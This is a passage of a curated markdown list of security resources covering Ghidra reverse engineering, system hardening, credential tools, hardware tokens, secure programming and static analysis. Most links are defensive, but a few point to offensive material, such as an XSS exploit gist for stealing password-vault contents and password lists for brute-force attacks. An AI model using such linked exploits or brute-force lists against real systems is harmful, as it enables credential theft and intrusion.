- [Working With Ghidra's P-Code To Identify Vulnerable Function Calls](https://www.riverloopsecurity.com/blog/2019/05/pcode/)
- [GhIDA](https://blog.talosintelligence.com/2019/09/ghida.html): [Ghidra decompiler for IDA Pro](https://github.com/Cisco-Talos/GhIDA).
- [Ghidraaas](https://github.com/Cisco-Talos/GhIDA): Ghidra as a Service
- [SVD-Loader for Ghidra](https://leveldown.de/blog/svd-loader/): Simplifying bare-metal ARM reverse engineering. [repo](https://github.com/leveldown-security/SVD-Loader-Ghidra)
- [GhidraX64Dbg](https://github.com/revolver-ocelot-saa/GhidraX64Dbg): Extract annoations from Ghidra into an X32/X64 dbg database.
- [Reverse Engineering Go Binaries with Ghidra](https://cujo.com/reverse-engineering-go-binaries-with-ghidra/)
- [Introduction to Reverse Engineering with Ghidra: A Four Session Course](https://wrongbaud.github.io/posts/ghidra-training/)
- [Ghidra Plugin Development for Vulnerability Research - Part-1](https://www.somersetrecon.com/blog/2019/ghidra-plugin-development-for-vulnerability-research-part-1)
- [AngryGhidra](https://github.com/Nalen98/AngryGhidra): Use angr in Ghidra
- [Defeating Code Obfuscation with Angr](https://napongizero.github.io/blog/Defeating-Code-Obfuscation-with-Angr)
- [ghidra2frida](https://security.humanativaspa.it/ghidra2frida-the-new-bridge-between-ghidra-and-frida/): The new bridge between Ghidra and Frida. [repo](https://github.com/federicodotta/ghidra2frida) [scripts](https://github.com/federicodotta/ghidra2frida/tree/main/java_python_examples)
- [ghidra-scripts](https://github.com/federicodotta/ghidra-scripts/): A collection of my Ghidra scripts.
- [Reversing Raw Binary Firmware Files in Ghidra](https://gist.github.com/nstarke/ed0aba2c882b8b3078747a567ee00520)
- [Ghidrathon](https://github.com/mandiant/Ghidrathon): The FLARE team's open-source extension to add [Python 3 scripting to Ghidra](https://www.mandiant.com/resources/blog/ghidrathon-snaking-ghidra-python-3-scripting).
- [IDA Graph view with outlined function included](https://gist.github.com/NyaMisty/790474707209399da643fbe5788191cd)
- [G-3PO: A Protocol Droid for Ghidra](https://medium.com/tenable-techblog/g-3po-a-protocol-droid-for-ghidra-4b46fa72f1ff) [repo](https://github.com/tenable/ghidra_tools/tree/main/g3po)

## Frameworks

- [Inject code into running Python processes](https://github.com/lmacken/pyrasite)
- [malspider](https://github.com/ciscocsirt/malspider): Malspider is a web spidering framework that detects characteristics of web compromises.
- [AIL-framework](https://github.com/CIRCL/AIL-framework): AIL framework - [Analysis Information Leak framework](https://github.com/ail-project/ail-framework):

## Patching

- Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes [They Did](https://0patch.blogspot.com.br/2017/11/did-microsoft-just-manually-patch-their.html). (CVE-2017-11882)

## Hardening

- [BlueWars](https://medium.com/blueops/bluewars-capture-the-flag-defensivo-que-aconteceu-na-h2hc-514c75e3f13c): Capture The Flag Defensivo que aconteceu na H2HC
- [CCAT](https://github.com/cisco-config-analysis-tool/ccat): Cisco Config Analysis Tool
- [Ciderpress](https://github.com/da667/Ciderpress): Hardened wordpress installer
- [debian-cis](https://github.com/ovh/debian-cis): PCI-DSS compliant Debian 7/8 hardening.
- [Endlessh](https://github.com/skeeto/endlessh): an SSH tarpit.
- [ERNW Repository of Hardening Guides](https://github.com/ernw/hardening): This repository contains various hardening guides compiled by ERNW for various purposes.
- [fero](https://github.com/coreos/fero): YubiHSM2-backed signing server
- [FirewallChecker](https://github.com/Z3Prover/FirewallChecker): A self-contained firewall checker
- [Get SSH login notification on Telegram](https://8192.one/post/ssh_login_notification_withtelegram/)
- [Hardentools](https://github.com/securitywithoutborders/hardentools) is a utility that disables a number of risky Windows features.
- [How To Secure A Linux Server](https://github.com/imthenachoman/How-To-Secure-A-Linux-Server): An evolving how-to guide for securing a Linux server.
- [kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check): A tool for checking the hardening options in the Linux kernel config
- [Implementing Least-Privilege Administrative Models](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models)
- [Iptables Essentials](https://github.com/trimstray/iptables-essentials): Common Firewall Rules and Commands.
- [iptables-essentials](https://github.com/trimstray/iptables-essentials): Iptables Essentials: Common Firewall Rules and Commands.
- [Keyringer](https://keyringer.pw/): encrypted and distributed secret sharing software
- [Keystone Project](https://keystone-enclave.org/). Github: [Keystone Enclave](https://github.com/keystone-enclave/)
- [linux-hardened](https://github.com/copperhead/linux-hardened): Minimal supplement to upstream Kernel Self Protection Project changes.
- [List of sites with two factor auth](https://github.com/2factorauth/twofactorauth)
- [nftables](https://www.funtoo.org/Package:Nftables): nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework.
- Nice article with a lot of resources: [Common approaches to securing Linux servers and what runs on them.](https://medium.com/@ageis/common-approaches-to-securing-linux-servers-and-what-runs-on-them-dadcacc5388b)
- [opmsg](https://github.com/stealth/opmsg): is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different.
- [prowler](https://github.com/toniblyx/prowler): AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for [AWS guide](https://d0.awsstatic.com/whitepapers/compliance/AWS_CIS_Foundations_Benchmark.pdf).
- [reconbf](https://github.com/HewlettPackard/reconbf): Recon system hardening scanner
- [Sarlacc](https://github.com/scrapbird/sarlacc) is an SMTP server that I use in my malware lab to collect spam from infected hosts.
- [Secure & Ad-free Internet Anywhere With Streisand and Pi Hole](https://ifelse.io/2019/01/12/secure-ad-free-internet-anywhere-with-streisand-and-pi-hole/)
- [Secure Secure Shell](https://stribika.github.io/2015/01/04/secure-secure-shell.html) by [stribika](https://github.com/stribika)
- [Securing Docker Containers](https://0x00sec.org/t/securing-docker-containers/16913). [The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production.](https://github.com/docker/docker-bench-security)
- [securityonion-docs](https://github.com/Security-Onion-Solutions/securityonion-docs)
- [security.txt](https://securitytxt.org/): A proposed standard which allows websites to define security policies.
- [security-txt](https://github.com/securitytxt/security-txt): A proposed standard that allows websites to define security policies.
- See your site config with [Hardenize](https://www.hardenize.com/)
- [Set up two-factor authentication for SSH on Fedora](https://fedoramagazine.org/two-factor-authentication-ssh-fedora/)
- [solo-hw](https://github.com/SoloKeysSec/solo-hw): Hardware sources for Solo
- [ssh-auditor](https://github.com/ncsa/ssh-auditor): The best way to scan for weak ssh passwords on your network
- [Streisand](https://github.com/StreisandEffect/streisand) sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.
- [The Practical Linux Hardening Guide](https://github.com/trimstray/the-practical-linux-hardening-guide): 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress.
- [tls-what-can-go-wrong](https://github.com/hannob/tls-what-can-go-wrong): TLS - what can go wrong?
- [upvote](https://github.com/google/upvote): A multi-platform binary whitelisting solution
- [Using a Hardened Container Image for Secure Applications in the Cloud](https://www.cisecurity.org/blog/using-hardened-container-image-secure-applications-cloud/)
- [Zero-knowledge attestation](https://www.imperialviolet.org/2019/01/01/zkattestation.html)
- [Reverie](https://blog.trailofbits.com/2020/12/14/reverie-an-optimized-zero-knowledge-proof-system/): An optimized zero-knowledge proof system.
- RHEL Like systems:
- [CentOS7 Lockdown](https://github.com/naingyeminn/CentOS7_Lockdown)
- [RHEL7-CIS](https://github.com/radsec/RHEL7-CIS): Ansible RHEL 7 - CIS Benchmark Hardening Script
- [cisecurity](https://github.com/cohdjn/cisecurity): Configures Linux systems to Center for Internet Security Linux hardening standard.
- [bdshemu](https://hvmi.github.io/blog/2020/11/11/bdshemu.html): The [Bitdefender](https://github.com/bitdefender/bddisasm) shellcode emulator
- [IPv6 Security Best Practices](https://theinternetprotocolblog.wordpress.com/2020/11/28/ipv6-security-best-practices/)
- [auditd](https://github.com/Neo23x0/auditd): Best Practice Auditd Configuration.
- [Hardened/PaX Quickstart](https://wiki.gentoo.org/wiki/Hardened/PaX_Quickstart)
- [tosh](https://github.com/mikroskeem/tosh): Imagine your SSH server only listens on an IPv6 address, and where the last 6 digits are changing every 30 seconds as a TOTP code...
- Kubernetes:
- [9 Kubernetes Security Best Practices Everyone Must Follow](https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow/)
- NSA/CISA [Kubernetes Hardening Guidance](https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF)
- [CHAPS](https://github.com/cutaway-security/chaps): Configuration Hardening Assessment PowerShell Script (CHAPS)
- [Awesome Windows Domain Hardening](https://github.com/PaulSec/awesome-windows-domain-hardening): A curated list of awesome Security Hardening techniques for Windows.
- [NSA/CISA Kubernetes Hardening Guidance](https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF)
- [Learn and Test DMARC](https://www.learndmarc.com/): Visualizing the communication between email servers will help you understand what SPF, DKIM, and DMARC do and how these mechanisms work.
- [VideoLan Robots.txt](https://www.videolan.org/robots.txt)
- [ssh & linux cheat sheets](https://blowstack.com/cheat-sheets/)
- [ssh-audit](https://github.com/jtesta/ssh-audit): SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)

### WebServers

- A lot of good posts by geek flare:
- [How to Configure SSL Certificate on Google Cloud Load Balancer?](https://geekflare.com/google-load-balancer-enable-ssl/)
- [Nginx Web Server Security & Hardening Guide](https://geekflare.com/nginx-webserver-security-hardening-guide/)
- [IBM HTTP Server Security & Hardening Guide](https://geekflare.com/ibm-http-server-security-guide/)
- [Apache Tomcat Hardening and Security Guide](https://geekflare.com/apache-tomcat-hardening-and-security-guide/)
- [How to Enable TLS 1.3 in Nginx, Cloudflare?](https://geekflare.com/enable-tls-1-3/)
- [Apache Web Server Hardening & Security Guide](https://geekflare.com/apache-web-server-hardening-security/) (broken!??)
- CaCerts
- [List of free rfc3161 servers.](https://gist.github.com/Manouchehri/fd754e402d98430243455713efada710) TSA Servers
- [certstream-server](https://github.com/CaliDog/certstream-server): Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir
- Apache:
- [Apache Security](https://www.feistyduck.com/library/apache-security/) by [Ivan Ristić](https://twitter.com/ivanristic)
- [dotdotslash](https://github.com/jcesarstef/dotdotslash): An tool to help you search for Directory Traversal Vulnerabilities
- [A new security header: Feature Policy](https://scotthelme.co.uk/a-new-security-header-feature-policy/)
- [How do I prevent apache from serving the .git directory?](https://serverfault.com/questions/128069/how-do-i-prevent-apache-from-serving-the-git-directory/128082#128082)
- Nginx:
- [20 Essential Things to Know if You’re on Nginx Web Server](https://www.ubuntupit.com/essential-things-to-know-if-youre-on-nginx-web-server/)
- [Nginx C function](https://nginx-c-function.github.io): Create your desired C application on top of nginx module
- [NGINX config for SSL with Let's Encrypt certs](https://gist.github.com/nrollr/9a39bb636a820fb97eec2ed85e473d38)
- [How to Configure Nginx SSL Certifcate Chain](https://futurestud.io/tutorials/how-to-configure-nginx-ssl-certifcate-chain)
- PHP:
- [Cheatsheet for finding vulnerable PHP code using grep](https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet): This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
- [It's All About Time](https://blog.ircmaxell.com/2014/11/its-all-about-time.html). [Time Trial](https://github.com/dmayer/time_trial)- A tool for performing feasibility analyses of timing attacks. [TimingIntrusionTool5000](https://github.com/aj-code/TimingIntrusionTool5000): A tool for performing network timing attacks on plaintext and hashed password authentication.
- [snuffleupagus](https://github.com/nbs-system/snuffleupagus): Security module for php7 - Killing bugclasses and virtual-patching the rest!
- [FOPO-PHP-Deobfuscator](https://github.com/Antelox/FOPO-PHP-Deobfuscator): A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
- [Decode.Tools](https://malware.expert/general/decode-tools-decode-php-obfuscator-by-fopo/): Decode PHP Obfuscator by FOPO
- Ruby:
- [TSS - Threshold Secret Sharing](https://github.com/grempe/tss-rb): A Ruby implementation of Threshold Secret Sharing (Shamir) as defined in IETF Internet-Draft draft-mcgrew-tss-03.txt
- [IT Security Guidelines for Transport Layer Security (TLS)](https://english.ncsc.nl/publications/publications/2021/january/19/it-security-guidelines-for-transport-layer-security-2.1)
- [A new security header: Feature Policy](https://scotthelme.co.uk/a-new-security-header-feature-policy/)
- [CAA Mandated by CA/Browser Forum](https://blog.qualys.com/ssllabs/2017/03/13/caa-mandated-by-cabrowser-forum)
- [dotdotslash](https://github.com/jcesarstef/dotdotslash): An tool to help you search for Directory Traversal Vulnerabilities
- [ENVOY](https://www.envoyproxy.io/) is an open source edge and service proxy, designed for cloud-native applications. [code](https://github.com/envoyproxy/envoy)
- [ghp](https://github.com/CurtisLusmore/ghp): A simple web server for serving static GitHub Pages locally
- [LEAR](https://github.com/Glorf/lear): Linux Engine for Asset Retrieval
- [NFHTTP](https://github.com/spotify/NFHTTP): A cross platform C++ HTTP library that interfaces natively to other platforms.
- [Security/Server Side TLS](https://wiki.mozilla.org/Security/Server_Side_TLS) by Mozilla
- [security.txt](https://securitytxt.org/): A proposed standard which allows websites to define security policies.
- [urlscan.io](https://urlscan.io/): A sandbox for the web
- [IT Security Guidelines for Transport Layer Security (TLS)](https://english.ncsc.nl/publications/publications/2021/january/19/it-security-guidelines-for-transport-layer-security-2.1)
- [QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems.](https://twitter.com/programmingart/status/1399443052851306503)
- [Secure Headers](https://github.com/github/secure_headers): Manages application of security headers with many safe defaults.
- [HTTP/2: The Sequel is Always Worse](https://portswigger.net/research/http2) [blackhat](https://www.blackhat.com/us-21/briefings/schedule/#http2-the-sequel-is-always-worse-22668)
- RFC 9116: [A File Format to Aid in Security Vulnerability Disclosure](https://www.rfc-editor.org/rfc/rfc9116)

## Credentials

- Search if your credentials where leaked: [Cr3dOv3r](https://github.com/D4Vinci/Cr3dOv3r)
- [pw-pwnage-cfworker](https://github.com/detroitenglish/pw-pwnage-cfworker): Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
- [XSS Exploit code for retrieving passwords stored in a Password Vault](https://gist.github.com/shawarkhanethicalhacker/e40a7c3956fdd24b9fb63d03d94c3d34)
- [login_duress](https://github.com/jcs/login_duress): A BSD authentication module for duress passwords
- [XSStrike](https://github.com/s0md3v/XSStrike): Most advanced XSS detection suite.
- [Was my password leaked?](https://davidtavarez.github.io/osint/2019/01/25/pwndb-command-line-tool-python.html) [pwndb](https://github.com/davidtavarez/pwndb): Search for creadentials leaked on pwndb.
- [bitwarden_rs](https://github.com/dani-garcia/bitwarden_rs/): Unofficial Bitwarden compatible server written in Rust
- [pcfg_cracker](https://github.com/lakiw/pcfg_cracker): Probabilistic Context Free Grammar (PCFG) password guess generator
- [Depix](https://github.com/beurtschipper/Depix): Recovers passwords from pixelized screenshots.
- [pwndb](https://github.com/davidtavarez/pwndb): Search for leaked credentials.
- [Password Lists](https://github.com/scipag/password-list): Password lists with top passwords to optimize bruteforce attacks.
- [pwndb.py](https://github.com/davidtavarez/pwndb): [Search for leaked credentials](https://davidtavarez.github.io/2019/tutorial-pwndb-command-line-tool-python/).
- KeePass [awsome](https://github.com/lgg/awesome-keepass):Curated list of KeePass-related projects
- [KeePassium](https://github.com/keepassium/KeePassium): KeePass-compatible password manager for iOS
- [Launch PowerShell Script From Within KeePass And Include Password Secure String Credential](https://www.sans.org/blog/launch-powershell-script-from-within-keepass-and-include-password-secure-string-credential/), [PowerShell for KeePass Password Manager](https://www.sans.org/blog/powershell-for-keepass-password-manager/), [PowerShell KeePass](https://github.com/PSKeePass/PoShKeePass).
- [libkeepass](https://github.com/libkeepass/libkeepass): Python module to read KeePass 1.x/KeePassX (v3) and KeePass 2.x (v4) files.
- [KeepassXC-Pwned](https://github.com/seanbreckenridge/keepassxc-pwned): Check your keepassxc database against previously breached haveibeenpwned passwords.

### Tokens

- [Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication](https://aws.amazon.com/pt/blogs/security/use-yubikey-security-key-sign-into-aws-management-console/)
- [Introducing the Qubes U2F Proxy](https://www.qubes-os.org/news/2018/09/11/qubes-u2f-proxy/)
- [YubiKey-Guide](https://github.com/drduh/YubiKey-Guide): Guide to using YubiKey for GPG and SSH
- [Using a Yubikey for GPG and SSH](https://0day.work/using-a-yubikey-for-gpg-and-ssh/): Sebastian Neef - 0day.work
- [PIN and Management Key](https://developers.yubico.com/yubikey-piv-manager/PIN_and_Management_Key.html)
- [Improve login security with challenge-response authentication](https://fedoramagazine.org/login-challenge-response-authentication/)
- [URU Card](https://en.ovcharov.me/2020/06/29/uru-card-arduino-fido2-authenticator/): Arduino FIDO2 Authenticator. [uru-card](https://github.com/uru-card/uru-card)
- [YubiKey at Datadog](https://github.com/DataDog/yubikey)
- [This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys.](https://github.com/drduh/YubiKey-Guide)
- [yubikey-ssh-setup](https://github.com/jessfraz/dotfiles/blob/master/bin/yubikey-ssh-setup)

## Secure Programming

- Hardening C/C++ Programs Part II: [Executable-Space Protection and ASLR](http://www.productive-cpp.com/hardening-cpp-programs-executable-space-protection-address-space-layout-randomization-aslr/)
- [Checklist of the most important security countermeasures when designing, testing, and releasing your API](https://github.com/shieldfy/API-Security-Checklist)
- [sanitizers](https://github.com/google/sanitizers)
- [Gitian](https://gitian.org) is a secure source-control oriented software distribution method.
- [Canary](https://github.com/psecio/canary): Input Detection and Response
- [Canarytokens](https://www.canarytokens.org/generate) by Thinkst, [Quick, Free, Detection for the Masses](https://blog.thinkst.com/p/canarytokensorg-quick-free-detection.html) [canaryfy](https://github.com/thinkst/canaryfy)
- [CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS](http://sdiwc.net/digital-library/canary-files-generating-fake-files-to-detect-critical-data-loss-from-complex-computer-networks)
- [How to Know if Someone Access your Files with Canary Tokens](https://santanderglobaltech.com/en/how-to-know-if-someone-access-your-files-with-canary-tokens/)
- [Wycheproof](https://github.com/google/wycheproof): Project Wycheproof tests crypto libraries against known attacks.
- [Web App Security 101](https://kruschecompany.com/blog/post/web-app-security): Keep Calm and Do Threat Modeling
- SSL/TLS for dummies:
- [part 1](https://www.wst.space/ssl-part1-ciphersuite-hashing-encryption/): Ciphersuite, Hashing, Encryption;
- [part 2](https://www.wst.space/ssl-part-2-diffie-hellman-key-exchange/): Understanding key exchange algorithm;
- [part 3](https://www.wst.space/ssl-part-3-certificate-authority/): Understanding Certificate Authority.
- [heaphopper](https://github.com/angr/heaphopper): HeapHopper is a bounded model checking framework for Heap-implementations
- [Ristretto](https://ristretto.group/ristretto.html) is a technique for constructing prime order elliptic curve groups with non-malleable encodings.
- [SEI CERT C Coding Standard](https://wiki.sei.cmu.edu/confluence/display/c/SEI+CERT+C+Coding+Standard): The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.
- [MSC24-C. Do not use deprecated or obsolescent functions](https://wiki.sei.cmu.edu/confluence/display/c/MSC24-C.+Do+not+use+deprecated+or+obsolescent+functions)
- [US-CERT: memcpy_s() and memmove_s()](https://www.us-cert.gov/bsi/articles/knowledge/coding-practices/memcpy_s%28%29-and-memmove_s%28%29)
- [Safe C Library](https://github.com/coruus/safeclib): The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming.
- [Field Experience With Annex K — Bounds Checking Interfaces](http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1967.htm)
- [TSLint](https://github.com/palantir/tslint): An extensible linter for the TypeScript language.
- [rubocop](https://github.com/rubocop-hq/rubocop): A Ruby static code analyzer and formatter, based on the community Ruby style guide.
- [Librando](https://www.ics.uci.edu/~perl/publication/librando/): transparent code randomization for just-in-time compilers
- [Checked C](https://www.microsoft.com/en-us/research/publication/checkedc-making-c-safe-by-extension/): Making C Safe by Extension. [github](https://github.com/Microsoft/checkedc)
- [Practical case: Buffer Overflow 0x01](https://maxkersten.nl/binary-analysis-course/assembly-basics/practical-case-buffer-overflow-0x01/)
- [pigaios](https://github.com/joxeankoret/pigaios): A tool for diffing source codes directly against binaries. [slides](https://docs.google.com/presentation/d/1ifvugStGL7Qc8xSFeYXp2MGQ6jQGOOMSolBrJy8kCMY/edit#slide=id.g4453e8add5_0_129)
- [pigaios](https://github.com/joxeankoret/pigaios): A tool for diffing source codes directly against binaries. [slides](https://docs.google.com/presentation/d/1ifvugStGL7Qc8xSFeYXp2MGQ6jQGOOMSolBrJy8kCMY/edit#slide=id.g4453e8add5_0_129)
- [A Git Horror Story](https://mikegerwitz.com/papers/git-horror-story): Repository Integrity With Signed Commits. How to use git securely (signing commits)
- [An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure](https://srg.doc.ic.ac.uk/files/slides/symex-tarot-18.pdf)
- [Tooling for verification of PGP signed commits](https://github.com/bitcoin/bitcoin/tree/master/contrib/verify-commits)
- [tlse](https://github.com/eduardsui/tlse): Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
- [tinyalloc](https://github.com/thi-ng/tinyalloc): malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
- [Sandboxed API](https://github.com/google/sandboxed-api): Sandboxed API automatically generates sandboxes for C/C++ libraries
- [HACL*](https://github.com/project-everest/hacl-star): a formally verified cryptographic library written in F*
- [Villoc](https://github.com/wapiflapi/villoc): Villoc is a heap visualisation tool, it's a python script that renders a static html file.
- [How C array sizes become part of the binary interface of a library](https://developers.redhat.com/blog/2019/05/06/how-c-array-sizes-become-part-of-the-binary-interface-of-a-library/)
- [MazuCC](https://github.com/jserv/MazuCC): A minimalist C compiler with x86_64 code generation
- [When the going gets tough](https://lambdasec.github.io/When-the-going-gets-tough-Understanding-the-challenges-with-Product-commoditization-in-SCA/): Understanding the challenges with Product commoditization in SCA.
- [huskyCI](https://github.com/globocom/huskyCI): huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.
- (pt-br) [GTER 47 | GTS 33 - Dia 2 (parte 1)](https://www.youtube.com/watch?v=7XgwJHOSmoE): nice talk by Daniel Carlier and Silvia Pimpão.
- [HTTP Security Headers](https://nullsweep.com/http-security-headers-a-complete-guide/) - A Complete Guide
- [SAFECode](https://safecode.org/): is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
- [Security Code Review 101](https://medium.com/@paul_io/security-code-review-101-a3c593dc6854)
- [Elliptic Curve Cryptography Explained](https://fangpenlin.com/posts/2019/10/07/elliptic-curve-cryptography-explained/)
- [Cheatsheet for finding vulnerable PHP code using grep](https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet): This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
- [How to Process Passwords as a Software Developer](https://dev.to/nathilia_pierce/how-to-process-passwords-as-a-software-developer-3dkh)
- [QL](https://github.com/Semmle/ql): The libraries and queries that power CodeQL and LGTM.com
- [Sendy is Insecure](https://victorzhou.com/blog/sendy-recaptcha-security/): How Not to Implement reCAPTCHA
- Win10 Crypto Vulnerability: [Cheating in Elliptic Curve Billiards 2](https://medium.com/zengo/win10-crypto-vulnerability-cheating-in-elliptic-curve-billiards-2-69b45f2dcab6)
- [DevSecOps](https://dzone.com/articles/devsecops-securing-software-in-a-devops-world): Securing Software in a DevOps World
- [GitGuardian Documentation and Resources](https://github.com/GitGuardian/APISecurityBestPractices): Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian. [python API Client](https://github.com/GitGuardian/py-gitguardian)
- [Vuln Cost - Security Scanner for VS Code](https://github.com/snyk/vulncost): Find security vulnerabilities in open source npm packages while you code.
- [Most Popular Analysis Tools by Programming Language](https://analysis-tools.dev/)
- [Deepsource](https://deepsource.io): tool that analyzes your repository.
- [git-wild-hunt](https://github.com/d1vious/git-wild-hunt): A tool to hunt for credentials in github wild AKA git*hunt
- [shhgit](https://github.com/eth0izzle/shhgit/): Ah [shhgit!](https://www.shhgit.com/) Find GitHub secrets in real time.
- [A Graduate Course in Applied Cryptography](http://toc.cryptobook.us/)
- [KaiMonkey](https://github.com/accurics/KaiMonkey): Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code.
- [You don’t need reproducible builds.](https://blog.cmpxchg8b.com/2020/07/you-dont-need-reproducible-builds.html)
- [Comments on build reproducibility](https://gist.github.com/brl/c55ab5d2633f366b680b5a7cca718f85)
- DevSecOps – [Integrating Security in the Development Pipeline](https://katanasec.com/devsecops-integrating-security-in-the-development-pipeline/)
- [SLSA](https://github.com/slsa-framework/slsa): Supply-chain Levels for Software Artifacts, Proposal
- [DazedAndConfused](https://github.com/salesforce/DazedAndConfused) is a tool to help determine dependency confusion exposure.
- [Security Scorecards](https://github.com/ossf/scorecard): Security health metrics for Open Source. [Check Documentation](https://github.com/ossf/scorecard/blob/main/docs/checks.md#check-documentation)
- [kcare-uchecker](https://github.com/cloudlinux/kcare-uchecker): A simple tool to detect outdated shared libraries.
- [Package Hunter](https://gitlab.com/gitlab-org/security-products/package-hunter): A tool for identifying malicious dependencies via runtime monitoring.
- [What science can tell us about C and C++'s security](https://alexgaynor.net/2020/may/27/science-on-memory-unsafety-and-security/)
- [Awesome AppSec](https://github.com/paragonie/awesome-appsec): A curated list of resources for learning about application security.
- [Comments on build reproducibility](https://gist.github.com/brl/c55ab5d2633f366b680b5a7cca718f85)

### Web Training

- [OWASP Broken Web Applications Project](https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project). [OWASP BWA](https://github.com/chuckfw/owaspbwa/) repository [files](https://sourceforge.net/projects/owaspbwa/files/1.2/).
- [dvna](https://github.com/appsecco/dvna): Damn Vulnerable NodeJS Application
- [VulnLab](https://github.com/Yavuzlar/VulnLab): A web vulnerability lab project developed by Yavuzlar.

### SAST

- [Static analysis powered security scanner for your terraform code](https://github.com/liamg/tfsec)
- [Scan](https://slscan.io/en/latest/) (skæn) is a free open-source security audit tool for modern DevOps teams. [sast-scan](https://github.com/ShiftLeftSecurity/sast-scan): A Free & Open Source DevSecOps Platform.
- [Coccinelle](https://coccinelle.gitlabpages.inria.fr/website/): is a program matching and transformation engine which provides the language SmPL (Semantic Patch Language) for specifying desired matches and transformations in C code.
- [brakeman](https://github.com/presidentbeef/brakeman): A static analysis security vulnerability scanner for Ruby on Rails applications.
- [How disable comments make static analysis tools worse](https://jfmengels.net/disable-comments/)
- [A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI](https://arxiv.org/abs/2107.12699)
- [Potential remote code execution in PyPI](https://blog.ryotak.me/post/pypi-potential-remote-code-execution-en/)
- [What's New with SAST + DAST](https://www.youtube.com/watch?v=_2U2h7NQPkk)
- [DevSecOps with DAST and Security Hub](https://aws.amazon.com/pt/blogs/aws-brasil/devsecops-com-dast-e-security-hub/)
- [Sonarqube Community Branch Plugin](https://github.com/mc1arke/sonarqube-community-branch-plugin): A plugin that allows branch analysis and pull request decoration in the Community version of Sonarqube.
- [SAST Analyzers](https://docs.gitlab.com/ee/user/application_security/sast/analyzers.html)
- [Pip-audit](https://portswigger.net/daily-swig/pip-audit-google-backed-tool-probes-python-environments-for-vulnerable-packages): Google-backed tool probes Python environments for vulnerable packages.
- [trivy](https://github.com/aquasecurity/trivy): Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues.
- [Horusec](https://www.zup.com.br/blog/desenvolvimento-seguro-horusec).
- [Source Code Analysis Tools](https://owasp.org/www-community/Source_Code_Analysis_Tools)
- [COVERITY SCAN](https://scan.coverity.com/)
- [Trojan Source](https://trojansource.codes/): invisible Source Code Vulnerabilities. [repo](https://github.com/nickboucher/trojan-source)
- [Warn users when a PR contains some characters](https://pagure.io/pagure/c/8bacd4da4fa6de578b818aa7a4b36bbeaaa243d7?branch=master): Unicode bi-directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired.
- [ikos](https://github.com/NASA-SW-VnV/ikos): Static analyzer for C/C++ based on the theory of Abstract Interpretation.
- [A Guide On Implementing An Effective SAST Workflow](https://www.anshumanbhartiya.com/posts/sast-workflow)

### Secure Web dev

- OWASP:
- [Introduction to OWASP Top 10 2021](https://owasp.org/Top10/)
- [OWASP Web Security Testing Guide](https://github.com/OWASP/wstg): The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services. [portal](https://owasp.org/www-project-web-security-testing-guide/)
- [OWASP-Testing-Checklist](https://github.com/tanprathan/OWASP-Testing-Checklist)
- [OWASP-Web-Checklist](https://github.com/0xRadi/OWASP-Web-Checklist): OWASP Web Application Security Testing Checklist.
- [Projects/OWASP Node js Goat Project](https://wiki.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project), [repo](https://github.com/OWASP/NodeGoat)
